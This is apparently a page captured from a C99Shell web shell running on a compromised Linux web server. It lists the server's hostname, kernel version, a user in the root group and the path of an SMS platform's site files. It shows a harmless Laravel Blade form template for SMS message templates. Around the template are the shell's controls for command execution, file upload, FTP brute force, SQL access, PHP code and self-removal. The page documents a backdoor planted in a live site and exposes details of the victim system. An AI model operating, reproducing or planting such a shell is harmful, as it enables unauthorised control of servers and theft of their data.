!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/resources/views/customer/dlt_template/   drwxr-xr-x
Free 28.92 GB of 117.98 GB (24.52%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     form.blade.php (3.33 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="form-group">
    <label for="name">@lang('Template Name') <span class="text-danger">*</span></label>
    <input value="{{isset($dlt_template) && $dlt_template->name?$dlt_template->name:old('name')}}" type="text" name="name"
           class="form-control" id="name"
           placeholder="@lang('customer.template_name')" required>
    <p id="name-exists" class="text-danger" style="display: none;" style="font-size: 12px;">This name already exists.</p>
</div>
<div class="form-group">
    <label for="name">@lang('customer.dlt_templateid') <span class="text-danger">*</span></label>
    <input value="{{isset($dlt_template) && $dlt_template->dlt_template_id?$dlt_template->dlt_template_id:old('dlt_template_id')}}" type="text" name="dlt_template_id"
           class="form-control" id="name"
           placeholder="@lang('customer.dlt_templateid')" required>
</div>
<div class="form-group">
    <label for="">@lang('customer.category') <span class="text-danger">*</span></label>
    <select name="category" class="form-control" id="category">
        <option {{isset($dlt_template) && $dlt_template->category=='promational'?'selected':''}} value="promational">@lang('customer.promational')</option>
        <option {{isset($dlt_template) && $dlt_template->category=='transactional'?'selected':''}} value="transactional">@lang('customer.transactional')</option>
        <option {{isset($dlt_template) && $dlt_template->category=='service_inferred'?'selected':''}} value="service_inferred">@lang('customer.service_inferred')</option>
        <option {{isset($dlt_template) && $dlt_template->category=='service_explicit'?'selected':''}} value="service_explicit">@lang('customer.service_explicit')</option>
    </select>
</div>
<div class="form-group">
    <label for="header_id">@lang('customer.header_id') </label> <span style="font-size: 12px">(<a href="{{ route('customer.headerid.request') }}"> @lang('Request Header ID') </a> )</span>
    <select name="header_id" class="form-control select2">
        @if(isset($senderIds))
           @foreach($senderIds as $key => $senderId)
               <option {{isset($dlt_template) && $dlt_template->header_id==$senderId->sender_id?'selected':''}} value="{{$senderId->sender_id}}">{{$senderId->sender_id}}</option>
           @endforeach
       @endif
    </select>
</div>
<div class="form-group">
    <label for="entity_id">@lang('customer.entity_id')</label>
    <input value="{{isset($dlt_template) && $dlt_template->entity_id?$dlt_template->entity_id:old('entity_id')}}" type="text" name="entity_id"
           class="form-control" id="entity_id"
           placeholder="@lang('customer.entity_id')">
</div>
<div class="form-group">
    <label for="message">@lang('customer.message') <span class="text-danger">*</span></label>
    <textarea name="message" class="form-control" placeholder="@lang('customer.message')" required>{{isset($dlt_template) && $dlt_template->message?$dlt_template->message:old('message')}}</textarea>
</div>
<div class="form-group">
    <label for="status">@lang('customer.status')</label>
    <select name="status" id="status" class="form-control">
        <option {{isset($dlt_template) && $dlt_template->status=='active'?'selected':''}} value="active">Active</option>
        <option {{isset($dlt_template) && $dlt_template->status=='inactive'?'selected':''}} value="inactive">Inactive</option>
    </select>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--